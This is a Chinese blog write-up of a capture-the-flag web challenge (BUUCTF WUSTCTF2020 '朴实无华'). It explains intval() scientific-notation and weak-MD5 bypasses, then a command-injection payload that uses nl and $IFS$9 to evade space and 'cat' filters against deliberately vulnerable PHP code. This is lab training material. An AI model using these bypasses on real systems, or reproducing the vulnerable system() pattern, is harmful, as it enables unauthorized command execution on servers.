BUUCTF [WUSTCTF2020] 朴实无华

最新推荐文章于 2024-04-05 05:33:02 发布
最新推荐文章于 2024-04-05 05:33:02 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF WUSTCTF2020 朴实无华 writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111220371
版权

BUUCTF [WUSTCTF2020] 朴实无华

考点:

  1. intval()函数科学计数法绕过
  2. 网页Unicode编码
  3. 变量md5()加密后与原值相等
  4. nltac等替代cat命令

启动靶机:
在这里插入图片描述
根据标签名

<title>人间极乐bot</title>

猜测可能有robots.txt协议,访问:
在这里插入图片描述
得到假的flag:
在这里插入图片描述
根据之前的Warning
在这里插入图片描述
猜测和请求头有关,使用BurpSuite抓取数据包:
在这里插入图片描述
Response中发现新的提示:

Look_at_me: /fl4g.php

访问该页面:
在这里插入图片描述
Chrome浏览器显示乱码,用火狐浏览器打开,在更多中,有文字编码
在这里插入图片描述
选择Unicode即可。

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
去非洲吧

得到页面源码:

  1. level 1
    需要通过GET方式传入变量$num的值,其经过intval()方法处理后比2020小,但+1后比2021大。

使用科学计数法可以在比较时截断,只返回为1,但在做加法运算后,

<?php
    $num = '2e4';
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "success!";
    }
?>

在这里插入图片描述
该方式可绕过,?num='2e4'
在这里插入图片描述
猜测传入后台后自动转换成字符串类型,去掉单引号,直接传入?num=2e4
在这里插入图片描述
成功通过level1

  1. level2
    通过GET传入变量$md5的值,通过弱类型比较,与md5加密后的值相等,即可绕过

也就是以0e开头的字符串,加密后还是以0e开头即可在若类型比较时均转换成整数0
在这里插入图片描述
字符串0e215962017符合该条件,尝试传入参数:?md5=0e215962017
在这里插入图片描述
成功通过level2

  1. get flag
    strstr()函数查找字符串的首次出现,区分大小写。
    str_ireplace()函数替换字符串中的一些字符,不区分大小写。
    其中通过GET方式传入的变量$get_flag不能包含空格cat
    传入的变量将会被当作命令执行,首先先查看当前目录下内容,构造payload:
?num=2e4&md5=0e215962017&get_flag=ls

在这里插入图片描述
其中文件fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag可能包含flag,使用nl命令替换cat命令,并且通过$IFS$9代替空格,构造最终payload:

?num=2e4&md5=0e215962017&get_flag=nl$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

在这里插入图片描述
得到flag。

Senimo_
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 456
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
note:就是一个朴实无华的笔记本
04-02
对数序列就是一个朴实无华的笔记本
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 1011
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
BUUCTF—Crypto大帝的秘密武器(详解,2024年网络安全网络编程总结篇
最新发布
m0_58269520的博客
04-05 1222
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
web buuctf [WUSTCTF2020]朴实无华
weixin_44214568的博客
04-01 386
1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...
BUUCTF:[WUSTCTF2020]朴实无华
末初的CSDN博客
06-24 1051
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
buuctf-朴实无华
m0_62094846的博客
04-06 300
扫目录也没扫出什么东西 标题上有bot,想到robots.txt(有点牵强) 继续查 然后线索就断了,但是这个页面应该不会没用,抓包看看(之前页面中header information-headers可能也暗示了查看头文件) 然后是一串乱码,可以在火狐浏览器的更多工具里查找修复文字编码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__fil...
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
logseq:就是一个朴实无华的笔记本
03-29
对数序列 就是一个朴实无华的笔记本
zapp:朴实无华的用作快速建造项目的基础库
03-19
为快速建造项目的基础库 开始 app := zapp . NewApp ( "test" ) app ....扩展性 组件 我们实现了一些组件,可以在找到 服务 我们实现了一些服务,可以在找到 ...作为一个基础库,我们尽量减少了依赖包,只需要以下包依赖 ...
一个朴实无华的Java计算引擎(很实用) 【文件备份一下,以免丢失】
11-16
一个朴实无华的Java计算引擎(很实用):https://blog.csdn.net/liuruiaaa/article/details/134447491
ctfbot:电报的CTF机器人
05-16
#CTF电报机器人 麻省理工学院许可 将文件config.js.dist复制到config.js ,并在开始之前进行适当的更改 JoséIgnacio Rojo < >
BUUCTF】[WUSTCTF2020]朴实无华
aoao331198的博客
05-01 1606
为什么打开robots.txt,一是看见源码中有提示,二是应该在没有思路时作为常规操作 显示flag也不会在里面 打开这个文件,看见源码 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET.
BUUCTF WEB 朴实无华1
qq_41696858的博客
12-21 181
打开场景,一堆乱码,让我们不要看headers,那不用说了,肯定hint在headers里面,burp抓包,当前页面headers没有啥的 那就扫目录吧,扫出来一个robots.txt,进 有一个fAke_flaaaaag.php,很明显是假的,我们再看headers头还是没有啥有用的 访问/fAke_flaaaaag.php,这次抓包发现一个look at me头,终于发现了正确的flag地址:/fl4g.php 什么,这就满足了?naive!访问下来是一堆源码,代码审计 <?php header(
[WUSTCTF2020]朴实无华
qq_43801002的博客
04-29 1958
题目: 题目一打开显示乱码,我们用火狐浏览器调整一下编码就OK,但是不知道为什么qq浏览器调整之后还是不行 火狐浏览器->三道杠->更多->文字编码->Unicode就可以了 痛苦才刚刚开始 1.看到bot字眼,第一眼想到buu的bot机器人,然后就想到robots.txt网站的爬虫规则,访问一下,果然有料 2.访问一下fAke_f1agggg.php,我就知道不会...
BUUCTF Web [WUSTCTF2020]朴实无华1
网安小趴菜
10-09 167
BUUCTF Web [WUSTCTF2020]朴实无华1
[WUSTCTF2020]朴实无华 1
m0_62879498的博客
05-07 1278
[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30 我们尝试访问文件 访问 fAke_f1agggg.php 使用 bp抓包 查看情况 发现了新的文件,尝试访问 发现了朱
BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
weixin_44632787的博客
10-07 700
启动挑战页面 访问一下robots.txt看看有没有什么提示 发现有个可疑的链接:/fAke_f1agggg.php 到这里就可以看到重要的源码了 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num .
第五十四题——[WUSTCTF2020]朴实无华
分享简单的安全技术
04-29 668
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,访问/robots.txt文件看到提示/fAke_f1agggg.php 第二步:访问/fAke_f1agggg.php,看到提示:/fl4g.php 第三步:访问/fl4g.php看到源码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值